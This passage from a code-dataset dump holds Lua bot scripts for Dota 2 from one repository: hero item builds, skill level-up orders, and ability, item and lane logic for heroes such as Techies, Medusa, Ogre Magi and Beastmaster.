npcBot:ActionImmediate_Chat(\"I'm going Mid!\", false)\n elseif lane_id == 3 then\n npcBot:ActionImmediate_Chat(\"I'm going Bot!\", false)\n end\n lane_claim = false\n end\n return\nend"
},
{
"alpha_fraction": 0.7202268242835999,
"alphanum_fraction": 0.7240075469017029,
"avg_line_length": 26.842105865478516,
"blob_id": "0ba935d5990c35a7471995fa3319b4e83f62bf94",
"content_id": "6b572709505001352c6717c00b945cfbba53314c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 529,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 19,
"path": "/mode_laning_tinker.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "require(GetScriptDirectory()..\"/UtilityData\");\nrequire(GetScriptDirectory()..\"/UtilityFunctions\");\n\nlocal npcBot = GetBot();\nlocal botTeam = GetTeam();\nlocal botLocArray = {};\n\nfunction GetDesire()\n\tlocal gameTime = DotaTime()\n\tlocal mode = npcBot:GetActiveMode();\n\tlocal modeDesire = npcBot:GetActiveModeDesire();\n\tlocal bootsSlot = npcBot:FindItemSlot(\"item_travel_boots\")\n\t\n\tif npcBot:GetItemSlotType(bootsSlot) == ITEM_SLOT_TYPE_MAIN then\n\t\treturn _G.desires[0]\n\tend\n--\tprint(gameTime)\n\treturn _G.desires[5];\nend\n"
},
{
"alpha_fraction": 0.7188012003898621,
"alphanum_fraction": 0.7303652167320251,
"avg_line_length": 33.59000015258789,
"blob_id": "fa50a62729e43dc265f199f17a753a321ea735dd",
"content_id": "62d03fe8462ff7167696f74a5fc96ecb80d1a0f2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 10377,
"license_type": "no_license",
"max_line_length": 204,
"num_lines": 300,
"path": "/ability_item_usage_techies.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local build = require(GetScriptDirectory()..\"/item_build_techies\")\nrequire(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\n\nlocal mine = npcBot:GetAbilityByName(\"techies_land_mines\")\nlocal stasis = npcBot:GetAbilityByName(\"techies_stasis_trap\")\nlocal blast = npcBot:GetAbilityByName(\"techies_suicide\")\nlocal remote = npcBot:GetAbilityByName(\"techies_remote_mines\")\nlocal lane_claim = true\n\nfunction BuybackUsageThink()\n if DotaTime() < -30 and lane_claim then\n local lane_id = npcBot:GetAssignedLane()\n if lane_id == 1 then\n npcBot:ActionImmediate_Chat(\"I'm going Top!\", false)\n elseif lane_id == 2 then\n npcBot:ActionImmediate_Chat(\"I'm going Mid!\", false)\n elseif lane_id == 3 then\n npcBot:ActionImmediate_Chat(\"I'm going Bot!\", false)\n end\n lane_claim = false\n end\n return\nend\n\nfunction AbilityLevelUpThink()\n\tlocal skillsToLevel = build[\"skills\"]\n\tif npcBot:GetAbilityPoints() > 0 and skillsToLevel[1] ~= nil then\n\t\tnpcBot:ActionImmediate_LevelAbility(skillsToLevel[1])\n\t\ttable.remove(skillsToLevel, 1)\n\tend\nend\n\n-- Logic for all Ability Usage behavior\nfunction AbilityUsageThink()\n\t-- Stats\n\tlocal currMana = npcBot:GetMana()\n\tlocal maxMana = npcBot:GetMaxMana()\n\tlocal currHP = npcBot:GetHealth()\n\tlocal maxHP = npcBot:GetMaxHealth()\n\tlocal mode = npcBot:GetActiveMode()\n\tlocal queue = npcBot:NumQueuedActions()\n\tlocal action = npcBot:GetCurrentActionType()\n\n\t-- Surroundings\n\tlocal nearbyEnemies = npcBot:GetNearbyHeroes(1000, true, BOT_MODE_NONE)\n\t----------------------------------------------------------------------------\n\n\t-- Use Proximity Mines and Remote Mines\n--\tif remote:IsFullyCastable() and action ~= BOT_ACTION_TYPE_USE_ABILITY then\n--\t\t-- Find the closest Remote Mine location and drop one\n--\t\tlocal distFromClosestLoc, closestLoc = getClosestLocation(npcBot)\n--\n--\t\tif distFromClosestLoc <= 1000 then\n--\t\t\tnpcBot:Action_UseAbilityOnLocation(remote,closestLoc)\n--\t\tend\n--\telse\n\tif mine:IsFullyCastable() and action ~= BOT_ACTION_TYPE_USE_ABILITY then \n\t\t-- drop a proximity mine near a tree near creeps\n\t\tlocal nearestCreep, nearestCreepDist = getNearestCreep()\n\t\tlocal trees = npcBot:GetNearbyTrees(1000)\n\n\t\tif table.getn(trees) > 0 and nearestCreepDist ~= nil and nearestCreepDist < 1500 and action ~= BOT_ACTION_TYPE_USE_ABILITY and action ~= BOT_ACTION_TYPE_ATTACK and action ~= BOT_ACTION_TYPE_MOVE_TO then\n\t\t\tlocal treeLoc = GetTreeLocation(trees[1]) + RandomVector(200)\n\t\t\t-- print (\"DROPPING Proximity Mine at: \"..treeLoc)\n\t\t\t-- print(nearestCreepDist, trees[1])\n\t\t\tif treeLoc[1] > -6800 then\n\t\t\t\tnpcBot:Action_UseAbilityOnLocation(mine, treeLoc)\n\t\t\tend\n\t\tend\n\tend\n\t\n\tif npcBot:GetActiveMode() == BOT_MODE_RETREAT and npcBot.other_mode == BOT_MODE_ROAM then\n\t\tif stasis:IsFullyCastable() and action ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\t\tnpcBot:Action_UseAbilityOnLocation(stasis, npcBot:GetLocation() + RandomVector(50))\n\t\tend\n\tend\nend\n\nfunction ItemUsageThink()\n\tlocal bottleLoc = npcBot:FindItemSlot(\"item_bottle\")\n\tlocal bottle = nil\n\tlocal bottleSlot = nil\n\tlocal botMana = npcBot:GetMana()\n\tlocal botMaxMana = npcBot:GetMaxMana()\n\tlocal botHP = npcBot:GetHealth()\n\tlocal botMaxHP = npcBot:GetMaxHealth()\n\tlocal currentMode = npcBot:GetActiveMode()\n\t\n\tlocal nearbyTrees = npcBot:GetNearbyTrees(1600)\n\tlocal nearbyEnemies = npcBot:GetNearbyHeroes(1600, true, BOT_MODE_NONE)\n\t\n\tlocal bountyTopRadLoc = GetRuneSpawnLocation(RUNE_BOUNTY_1)\n\tlocal bountyBotRadLoc = GetRuneSpawnLocation(RUNE_BOUNTY_2)\n\tlocal bountyTopDirLoc = GetRuneSpawnLocation(RUNE_BOUNTY_3)\n\tlocal bountyBotDirLoc = GetRuneSpawnLocation(RUNE_BOUNTY_4)\n\t\n\tlocal bountyTopRadDist = GetUnitToLocationDistance(npcBot, bountyTopRadLoc)\n\tlocal bountyBotRadDist = GetUnitToLocationDistance(npcBot, bountyBotRadLoc)\n\tlocal bountyTopDirDist = GetUnitToLocationDistance(npcBot, bountyTopDirLoc)\n\tlocal bountyBotDirDist = GetUnitToLocationDistance(npcBot, bountyBotDirLoc)\n\t\n\tlocal enemies = npcBot:GetNearbyHeroes(1600, true, BOT_MODE_NONE)\n\n\tlocal clarity = nil\n\tlocal bottle = nil\n\tlocal salve = nil\n\tlocal tango = nil\n\tlocal soul = nil\n\tlocal boots = nil\n\tlocal portal = nil\n\tlocal arcane = nil\n\tlocal cyclone = nil\n\t\n\tlocal courierLoc = npcBot:FindItemSlot(\"item_courier\")\n\tlocal clarityLoc = npcBot:FindItemSlot(\"item_clarity\")\n\tlocal bottleLoc = npcBot:FindItemSlot(\"item_bottle\")\n\tlocal salveLoc = npcBot:FindItemSlot(\"item_flask\")\n\tlocal tangoLoc = npcBot:FindItemSlot(\"item_tango\")\n\tlocal soulLoc = npcBot:FindItemSlot(\"item_soul_ring\")\n\tlocal bootsLoc = npcBot:FindItemSlot(\"item_travel_boots\")\n\tlocal portalLoc = npcBot:FindItemSlot(\"item_tpscroll\")\n\tlocal arcaneLoc = npcBot:FindItemSlot(\"item_arcane_boots\")\n\tlocal cycloneLoc = npcBot:FindItemSlot(\"item_cyclone\")\n\t\n\tif npcBot:GetItemSlotType(clarityLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tclarity = npcBot:GetItemInSlot(clarityLoc)\n\tend\n\tif npcBot:GetItemSlotType(bottleLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tbottle = npcBot:GetItemInSlot(bottleLoc)\n\tend\n\tif npcBot:GetItemSlotType(salveLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tsalve = npcBot:GetItemInSlot(salveLoc)\n\tend\n\tif npcBot:GetItemSlotType(tangoLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\ttango = npcBot:GetItemInSlot(tangoLoc)\n\tend\n\tif npcBot:GetItemSlotType(soulLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tsoul = npcBot:GetItemInSlot(soulLoc)\n\tend\n\tif npcBot:GetItemSlotType(bootsLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tboots = npcBot:GetItemInSlot(bootsLoc)\n\tend\n\tif npcBot:GetItemSlotType(portalLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tportal = npcBot:GetItemInSlot(portalLoc)\n\tend\n\tif npcBot:GetItemSlotType(arcaneLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tarcane = npcBot:GetItemInSlot(arcaneLoc)\n\tend\n\tif npcBot:GetItemSlotType(cycloneLoc) == ITEM_SLOT_TYPE_MAIN then\n\t\tcyclone = npcBot:GetItemInSlot(cycloneLoc)\n\tend\n\t\n\tif bountyTopRadDist < 200 and bountyTopRadDist ~= 0 then\n\t\tnpcBot:Action_PickUpRune(RUNE_BOUNTY_1)\n\telseif bountyBotRadDist < 200 and bountyBotRadDist ~= 0 then\n\t\tnpcBot:Action_PickUpRune(RUNE_BOUNTY_2)\n\telseif bountyTopDirDist < 200 and bountyTopDirDist ~= 0 then\n\t\tnpcBot:Action_PickUpRune(RUNE_BOUNTY_3)\n\telseif bountyBotDirDist < 200 and bountyBotDirDist ~= 0 then\n\t\tnpcBot:Action_PickUpRune(RUNE_BOUNTY_4)\n\tend\n\t\n\t-- Drop Clarities and Salves if boots acquired\n\tif arcane ~= nil then\n\t\tif clarity ~= nil then\n\t\t\tnpcBot:Action_DropItem(clarity, npcBot:GetLocation() + RandomVector(100))\n\t\tend\n\t\tif salve ~= nil then\n\t\t\tnpcBot:Action_DropItem(salve, npcBot:GetLocation() + RandomVector(100))\n\t\tend\n\t\tif tango ~= nil then\n\t\t\tnpcBot:Action_DropItem(tango, npcBot:GetLocation() + RandomVector(100))\n\t\tend\n\t\tif portal ~= nil then\n\t\t\tnpcBot:Action_DropItem(portal, npcBot:GetLocation() + RandomVector(100))\n\t\tend\n\tend\n\t\n\tlocal baseMana = mine:GetManaCost()\n\tif remote:GetManaCost() > 0 then\n\t\tbaseMana = remote:GetManaCost()\n\tend \n\t\n\tif botMana < baseMana and not npcBot:HasModifier(\"modifier_clarity_potion\") and not npcBot:IsChanneling() then\n\t\tif arcane ~= nil and arcane:IsCooldownReady() then\n\t\t\tprint(\" Using ARCANE BOOTS\")\n \t\tnpcBot:Action_UseAbility(arcane)\n\t\telseif (bottle == nil and clarity ~= nil) or (bottle ~= nil and bottle:GetCurrentCharges() == 0 and clarity ~= nil) or boots == nil then\n \t\tnpcBot:Action_UseAbilityOnEntity(clarity, npcBot)\n \telseif soul ~= nil and botHP/botMaxHP >= 0.4 and not npcBot:HasModifier(\"modifier_item_soul_ring\") and not npcBot:HasModifier(\"modifier_item_soul_ring_buff\") then\n \t\tnpcBot:Action_UseAbility(soul)\n \tend\n end\n \n\tif botHP/botMaxHP < 0.5 and not npcBot:IsChanneling() then\n\t\tif salve ~= nil and not npcBot:HasModifier(\"modifier_flask_healing\") then\n\t\t\tnpcBot:Action_UseAbilityOnEntity(salve, npcBot)\n\t\telseif bottle ~= nil and bottle:GetCurrentCharges() > 0 and npcBot:DistanceFromFountain() ~= 0 then\n\t\t\tnpcBot:Action_UseAbility(bottle)\n\t\telseif tango ~= nil and #nearbyTrees > 0 and not npcBot:HasModifier(\"modifier_tango_heal\") then\n\t\t\tnpcBot:Action_UseAbilityOnTree(tango, nearbyTrees[1])\n\t\tend\n\tend\n\n -- Use courier if in inventory\n\tif courierLoc ~= nil then\n\t\tlocal courier = npcBot:GetItemInSlot(courierLoc)\n\t\tif courier ~= nil then\n\t\t\tnpcBot:Action_UseAbility(courier)\n\t\tend\n\tend\n\t\n\t-- Use bottle if mana is low\n\tif bottleLoc ~= nil and not npcBot:IsChanneling() then\n\t\tbottle = npcBot:GetItemInSlot(bottleLoc)\n\t\tbottleSlot = npcBot:GetItemSlotType(bottleLoc)\n\t\t\n\t\tif bottle ~= nil and botMana/botMaxMana < 0.3 then\n\t\t\tif bottle:GetCurrentCharges() > 0 then\n\t\t\t\tnpcBot:Action_UseAbility(bottle)\n\t\t\tend\n\t\tend\n\tend\n\t\n\tif npcBot.other_mode == BOT_MODE_ROAM and npcBot:GetActiveMode() == BOT_MODE_RETREAT and cyclone ~= nil and table.getn(nearbyEnemies) > 0 then\n\t\tlocal enemy = nearbyEnemies[1]\n\t\t\n\t\tnpcBot:Action_UseAbilityOnEntity(cyclone, enemy)\n\tend\nend\n\nfunction getNearestCreep()\n\tlocal nearbyCreeps = npcBot:GetNearbyCreeps(500, true)\n\tif #nearbyCreeps > 0 then\n\t\tlocal nearestCreep = nil\n\t\tlocal nearestCreepDist = -50\n\t\tfor _, creep in pairs(nearbyCreeps) do\n\t\t\tlocal dist = GetUnitToUnitDistance(npcBot, creep)\n\t\t\tif nearestCreepDist == -50 then\n\t\t\t\tnearestCreepDist = dist\n\t\t\t\tnearestCreep = creep\n\t\t\telseif nearestCreepDist > dist then\n\t\t\t\tnearestCreepDist = dist\n\t\t\t\tnearestCreep = creep\n\t\t\tend\n\t\tend\n\t\treturn nearestCreep, nearestCreepDist\n\tend\n\treturn nil, nil\nend\n\nfunction getClosestLocation(bot)\n\tlocal closestDist = -50\n\tlocal closestLoc = nil\n\tlocal locsToUse = nil\n\tlocal radTowerCount = 0\n\tlocal dirTowerCount = 0\n\n\tfor _, towerID in pairs(_G.towers) do\n\t\t local tower = GetTower(_G.teams[1], towerID)\n\t\t if tower ~= nil then\n\t\t \tradTowerCount = radTowerCount + 1\n\t\t \t-- Maybe consider tower HP\n\t\t end\n\tend\n\tfor _, towerID in pairs(_G.towers) do\n\t\t local tower = GetTower(_G.teams[2], towerID)\n\t\t if tower ~= nil then\n\t\t \tradTowerCount = dirTowerCount + 1\n\t\t \t-- Maybe consider tower HP\n\t\t end\n\tend\n\n\tfor _, loc in pairs(_G.rad_early_remote_locs) do\n\t\tlocal dist = GetUnitToLocationDistance(bot, loc)\n\t\tif closestDist == -50 then\n\t\t\tclosestDist = dist\n\t\t\tclosestLoc = loc\n\t\telse\n\t\t\tif dist < closestDist then\n\t\t\t\tclosestDist = dist\n\t\t\t\tclosestLoc = loc\n\t\t\tend\n\t\tend\n\tend\n\n\treturn closestDist, closestLoc\nend\n\nfunction getTeamObject(team, rad, dir)\n\tif team == _G.teams[1] then\n\t\treturn rad\n\telse\n\t\treturn dir\n\tend\nend\n"
},
{
"alpha_fraction": 0.5180356502532959,
"alphanum_fraction": 0.5614950060844421,
"avg_line_length": 25.45977020263672,
"blob_id": "fa742bb1553d3dd8f27dd5c449dedcffc4a0cd61",
"content_id": "cdcb03b77b4c7b40010e040d80784da0f367348b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 2301,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 87,
"path": "/item_build_medusa.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "X = {}\nrequire(GetScriptDirectory() .. \"/UtilityFunctions\")\nlocal npcBot = GetBot()\nlocal talents = fillTalentTable(npcBot)\n\nX[\"items\"] = {\n -- start --\n\t\"item_slippers\",\n \"item_circlet\",\n \"item_recipe_wraith_band\",\n \"item_tango\",\n -- ring of basilius --\n \"item_sobi_mask\",\n \"item_ring_of_protection\",\n -- phase boots --\n \"item_boots\",\n \"item_blades_of_attack\",\n \"item_blades_of_attack\",\n -- mask of madness --\n \"item_lifesteal\",\n \"item_quarterstaff\",\n -- hurricane pike --\n \"item_ogre_axe\",\n \"item_boots_of_elves\",\n \"item_boots_of_elves\",\n \"item_staff_of_wizardry\",\n \"item_ring_of_health\",\n \"item_recipe_force_staff\",\n \"item_slippers\",\n \"item_circlet\",\n \"item_recipe_wraith_band\",\n -- eye of skadi --\n \"item_ultimate_orb\",\n \"item_point_booster\",\n \"item_ultimate_orb\",\n -- divine rapier --\n \"item_relic\",\n \"item_demon_edge\",\n}\n\nlocal split_shot = \"medusa_split_shot\"\nlocal mystic_snake = \"medusa_mystic_snake\"\nlocal mana_shield = \"medusa_mana_shield\"\nlocal stone_gaze = \"medusa_stone_gaze\"\n\nlocal talent_20_right = \"special_bonus_mp_700\"\nlocal talent_25_left = \"special_bonus_unique_medusa_4\"\n\nX[\"skills\"] = {\n mystic_snake, --1\n mana_shield, --2 \n mystic_snake, --3\n mana_shield, --4\n mystic_snake, --5\n split_shot, --6\n mystic_snake, --7\n split_shot, --8\n split_shot, --9\n talents[1], --10\n stone_gaze, --11\n split_shot, --12\n mana_shield, --13\n mana_shield, --14\n talents[3], --15\n stone_gaze, --16\n -- \"-1\", --17\n stone_gaze, --18\n -- \"-1\", --19\n talent_20_right, --20\n -- \"-1\", \t --21\n -- \"-1\", \t --22\n -- \"-1\", --23\n -- \"-1\", --24\n talent_25_left, --25\n}\n\n\n-- 7[VScript] 9\tspecial_bonus_unique_medusa_2\n-- 1[VScript] 10\tspecial_bonus_attack_damage_20\n-- 2[VScript] 11\tspecial_bonus_evasion_15\n-- 3[VScript] 12\tspecial_bonus_attack_speed_30\n-- 4[VScript] 13\tspecial_bonus_unique_medusa_3\n-- 5[VScript] 14\tspecial_bonus_mp_700\n-- 6[VScript] 15\tspecial_bonus_unique_medusa\n-- 7[VScript] 16\tspecial_bonus_unique_medusa_2\n-- 8[VScript] 17\tspecial_bonus_unique_medusa_4\nreturn X"
},
{
"alpha_fraction": 0.6198745965957642,
"alphanum_fraction": 0.629522442817688,
"avg_line_length": 25.9350643157959,
"blob_id": "8a3dfd5617a5d8fbd477494757a0f6f2167f926d",
"content_id": "7262cec979f3f29f8f07b335d33d0c425ed4aeaa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 2073,
"license_type": "no_license",
"max_line_length": 210,
"num_lines": 77,
"path": "/item_build_ogre_magi.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "X = {}\nrequire(GetScriptDirectory() .. \"/UtilityFunctions\")\nlocal npcBot = GetBot()\nlocal talents = fillTalentTable(npcBot)\n\nX[\"items\"] = {\n \"item_orb_of_venom\",\n \"item_wind_lace\",\n \"item_boots\",\n \"item_magic_stick\",\n \"item_branches\",\n \"item_branches\",\n \"item_enchanted_mango\",\n \"item_energy_booster\",\n \"item_staff_of_wizardry\",\n \"item_ring_of_health\",\n \"item_recipe_force_staff\", -- sell orb ActionImmediate_SellItem(item)\n \"item_infused_raindrop\",\n \"item_circlet\",\n \"item_ring_of_protection\",\n \"item_recipe_urn_of_shadows\",-- drop TP Action_DropItem(item, location)\n \"item_shadow_amulet\",\n \"item_cloak\",\n \"item_vitality_booster\",\n \"item_recipe_spirit_vessel\",\n \"item_point_booster\",\n \"item_staff_of_wizardry\",\n \"item_ogre_axe\",\n \"item_blade_of_alacrity\", -- sell wand, disassemble arcane boots, unlock boots of speed ActionImmediate_SellItem(item), ActionImmediate_DisassembleItem(item), ActionImmediate_SetItemCombineLock(item, false)\n \"item_recipe_travel_boots\", -- unlock energy booster ActionImmediate_SetItemCombineLock(item, false)\n \"item_void_stone\",\n \"item_recipe_aether_lens\", -- sell glimmer cape ActionImmediate_SellItem(item)\n \"item_vitality_booster\",\n \"item_energy_booster\",\n \"item_recipe_aeon_disk\"\n}\n\nlocal fireblast = \"ogre_magi_fireblast\"\nlocal ignite = \"ogre_magi_ignite\"\nlocal bloodlust = \"ogre_magi_bloodlust\"\nlocal unblast = \"ogre_magi_unrefined_fireblast\"\nlocal multi = \"ogre_magi_multicast\"\n\nlocal t1 = \"special_bonus_gold_income_10\"\nlocal t2 = \"special_bonus_hp_300\"\nlocal t3 = \"special_bonus_unique_ogre_magi\"\nlocal t4 = \"special_bonus_unique_ogre_magi_2\"\n\nX[\"skills\"] = {\n ignite, \n fireblast, \n ignite, \n bloodlust, \n bloodlust,\n multi, \n bloodlust, \n ignite, \n ignite, \n t1,\n bloodlust, \n multi,\n fireblast,\n fireblast,\n t2,\n fireblast, \n \"-1\", \n multi,\n \"-1\", \t\n t3,\n \"-1\", \t\n \"-1\", \t\n \"-1\", \n \"-1\", \n t4\n}\n\nreturn X"
},
{
"alpha_fraction": 0.5813339948654175,
"alphanum_fraction": 0.5913829803466797,
"avg_line_length": 40.25388717651367,
"blob_id": "66f33937e6065f4826e7922766fb41430f75f6e5",
"content_id": "efc049805270424b99286011f3be0df96e8899b3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 7961,
"license_type": "no_license",
"max_line_length": 186,
"num_lines": 193,
"path": "/ability_item_usage_beastmaster.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local build = require(GetScriptDirectory()..\"/item_build_beastmaster\")\nrequire(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\nlocal lane_claim = true\n\nfunction AbilityLevelUpThink()\n local skillsToLevel = build[\"skills\"]\n-- if npcBot:GetAbilityPoints() < 1 or (GetGameState() ~= GAME_STATE_PRE_GAME \n-- \tand GetGameState() ~= GAME_STATE_GAME_IN_PROGRESS) then\n-- return\n-- end\n if npcBot:GetAbilityPoints() > 0 and skillsToLevel[1] ~= \"-1\" \n \tand skillsToLevel[1] ~= nil then\n \tnpcBot:ActionImmediate_LevelAbility(skillsToLevel[1])\n \ttable.remove(skillsToLevel, 1)\n end\nend\n\nfunction AbilityUsageThink()\n local botMana = npcBot:GetMana()\n local botHealth = npcBot:GetHealth()\n local bot_location_x = npcBot:GetLocation()[1]\n local bot_location_y = npcBot:GetLocation()[2]\n local action = npcBot:GetCurrentActionType()\n\n local wild_axes = npcBot:GetAbilityByName(\"beastmaster_wild_axes\")\n local call_of_the_wild = npcBot:GetAbilityByName(\"beastmaster_call_of_the_wild\")\n local inner_beast = npcBot:GetAbilityByName(\"beastmaster_inner_beast\")\n local primal_roar = npcBot:GetAbilityByName(\"beastmaster_primal_roar\")\n\n local wild_axes_level = wild_axes:GetLevel()\n\n if action ~= BOT_ACTION_TYPE_USE_ABILITY and action ~= BOT_ACTION_TYPE_ATTACK then\n -- primal_roar think --\n if primal_roar ~= nil and primal_roar:IsFullyCastable() then\n action_mode = npcBot:GetActiveMode()\n if action_mode == 2 then\n local nearbyEnemies = npcBot:GetNearbyHeroes(1200, true, BOT_MODE_NONE)\n local strongerEnemy = nil\n\n for k, enemy in pairs(nearbyEnemies) do\n if strongerEnemy == nil then\n strongerEnemy = enemy\n else\n if enemy:GetRawOffensivePower() > strongerEnemy:GetRawOffensivePower() then\n strongerEnemy = enemy\n end\n end\n end\n\n print(\"Ability : Using Primal Roar\")\n npcBot:Action_UseAbilityOnEntity(primal_roar, strongerEnemy)\n end\n end\n \n -- wild_axes think --\n if wild_axes ~= nil and wild_axes:IsFullyCastable() and wild_axes_level >= 2 then\n local nearbyEnemies = npcBot:GetNearbyHeroes(1600, true, BOT_MODE_NONE)\n local strongerEnemy = nil\n\n for k, enemy in pairs(nearbyEnemies) do\n if strongerEnemy == nil then\n strongerEnemy = enemy\n else\n if enemy:GetRawOffensivePower() > strongerEnemy:GetRawOffensivePower() then\n strongerEnemy = enemy\n end\n end\n end\n\n if strongerEnemy ~= nil then\n if botTeam == 2 then\n local wildAxeLoc = _G.getVectorBetweenTargetPercentage(npcBot, strongerEnemy, 1.1)\n print(\"Ability : Using Wild Axe on \", wildAxeLoc)\n npcBot:Action_UseAbilityOnLocation(wild_axes, wildAxeLoc)\n else\n local wildAxeLoc = _G.getVectorBetweenTargetPercentage(strongerEnemy, npcBot, 1.1)\n print(\"Ability : Using Wild Axe on \", wildAxeLoc)\n npcBot:Action_UseAbilityOnLocation(wild_axes, wildAxeLoc)\n end\n else\n action_mode = npcBot:GetActiveMode()\n if action_mode == BOT_MODE_FARM then\n local nearbyCreeps = npcBot:GetNearbyLaneCreeps(1000, true)\n if #nearbyCreeps >= 3 then\n if botTeam == 2 then\n local wildAxeLoc = _G.getVectorBetweenTargetPercentage(npcBot, nearbyCreeps[3], 1.1)\n print(\"Ability : Using Wild Axe on \", wildAxeLoc)\n npcBot:ActionQueue_UseAbilityOnLocation(wild_axes, wildAxeLoc)\n else\n local wildAxeLoc = _G.getVectorBetweenTargetPercentage(nearbyCreeps[3], npcBot, 1.1)\n print(\"Ability : Using Wild Axe on \", wildAxeLoc)\n npcBot:ActionQueue_UseAbilityOnLocation(wild_axes, wildAxeLoc)\n end\n end\n end\n end\n -- wildAxeLoc = {bot_location_x+400, bot_location_y+400}\n -- print(npcBot:GetLocation())\n -- npcBot:Action_UseAbilityOnLocation(wild_axes, npcBot:GetLocation())\n end\n\n -- call_of_the_wild think -- \n if call_of_the_wild ~= nil and call_of_the_wild:IsFullyCastable() then\n npcBot:Action_UseAbility(call_of_the_wild)\n print(\"Ability : Using call of wild\")\n end\n end\nend\n\n-- function ItemUsageThink()\n-- local clarity = nil\n-- local soul = nil\n-- local necro1 = nil\n-- local necro2 = nil\n-- local necro3 = nil\n\n-- local clarityLoc = npcBot:FindItemSlot(\"item_clarity\")\n-- local soulLoc = npcBot:FindItemSlot(\"item_soul_ring\")\n-- local necro1Loc = npcBot:FindItemSlot(\"item_necronomicon_1\")\n-- local necro2Loc = npcBot:FindItemSlot(\"item_necronomicon_2\")\n-- local necro3Loc = npcBot:FindItemSlot(\"item_necronomicon_3\")\n\n-- if npcBot:GetItemSlotType(clarityLoc) == ITEM_SLOT_TYPE_MAIN then\n-- \t\tclarity = npcBot:GetItemInSlot(clarityLoc)\n-- \tend\n-- if npcBot:GetItemSlotType(soulLoc) == ITEM_SLOT_TYPE_MAIN then\n-- \t\tsoul = npcBot:GetItemInSlot(soulLoc)\n-- \tend\n-- if npcBot:GetItemSlotType(necro1Loc) == ITEM_SLOT_TYPE_MAIN then\n-- \t\tclarity = npcBot:GetItemInSlot(necro1Loc)\n-- \tend\n-- if npcBot:GetItemSlotType(necro2Loc) == ITEM_SLOT_TYPE_MAIN then\n-- \t\tclarity = npcBot:GetItemInSlot(necro2Loc)\n-- \tend\n-- if npcBot:GetItemSlotType(necro3Loc) == ITEM_SLOT_TYPE_MAIN then\n-- \t\tclarity = npcBot:GetItemInSlot(necro3Loc)\n-- \tend\n\n-- local action_mode = npcBot:GetActiveMode()\n\n-- local botMana = npcBot:GetMana()\n-- \tlocal botMaxMana = npcBot:GetMaxMana()\n-- if botMana/botMaxMana < 0.4 and not npcBot:HasModifier(\"modifier_clarity_potion\") then\n-- \t\tif (bottle == nil and clarity ~= nil) or (bottle ~= nil and bottle:GetCurrentCharges() == 0 and clarity ~= nil) or boots == nil then\n-- \t\tnpcBot:Action_UseAbilityOnEntity(clarity, npcBot)\n-- \telseif soul ~= nil then\n-- \t\tnpcBot:Action_UseAbility(soul)\n-- \tend\n-- end\n\n-- -- if action_mode == BOT_MODE_PUSH_TOWER_TOP or action_mode == BOT_MODE_PUSH_TOWER_MID or BOT_MODE_PUSH_TOWER_MID == BOT_MODE_PUSH_TOWER_BOT or action_mode == BOT_MODE_ATTACK then\n-- if necro1Loc ~= nil then\n-- local necro1 = npcBot:GetItemInSlot(necro1Loc)\n-- if necro1 ~= nil then\n-- npcBot:Action_UseAbility(necro1)\n-- end\n-- end\n \n-- if necro2Loc ~= nil then\n-- local necro2 = npcBot:GetItemInSlot(necro2Loc)\n-- if necro2 ~= nil then\n-- npcBot:Action_UseAbility(necro2)\n-- end\n-- end\n\n-- if necro3Loc ~= nil then\n-- local necro3 = npcBot:GetItemInSlot(necro3Loc)\n-- if necro3 ~= nil then\n-- npcBot:Action_UseAbility(necro3)\n-- end\n-- end\n-- -- end\n \n-- end\n\nfunction BuybackUsageThink()\n if DotaTime() < -30 and lane_claim then\n local lane_id = npcBot:GetAssignedLane()\n if lane_id == 1 then\n npcBot:ActionImmediate_Chat(\"I'm going Top!\", false)\n elseif lane_id == 2 then\n npcBot:ActionImmediate_Chat(\"I'm going Mid!\", false)\n elseif lane_id == 3 then\n npcBot:ActionImmediate_Chat(\"I'm going Bot!\", false)\n end\n lane_claim = false\n end\n return\nend"
},
{
"alpha_fraction": 0.7083333134651184,
"alphanum_fraction": 0.7291666865348816,
"avg_line_length": 14.666666984558105,
"blob_id": "1fb6ef6bb6e90b995a07b8f1b998e7edd3475636",
"content_id": "e39cadccc78d9433a399e1e0710a7df8acb8b0c6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 48,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 3,
"path": "/mode_push_tower_top_tinker.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "\nfunction GetDesire()\n\treturn _G.desires[0]\nend\n"
},
{
"alpha_fraction": 0.7245556712150574,
"alphanum_fraction": 0.7341786623001099,
"avg_line_length": 38.26222229003906,
"blob_id": "0bde3419070874fd32e90bae60072b87dfe7019a",
"content_id": "abf036a218c11b26b8dc9e6e11359112b128e5a7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 8833,
"license_type": "no_license",
"max_line_length": 167,
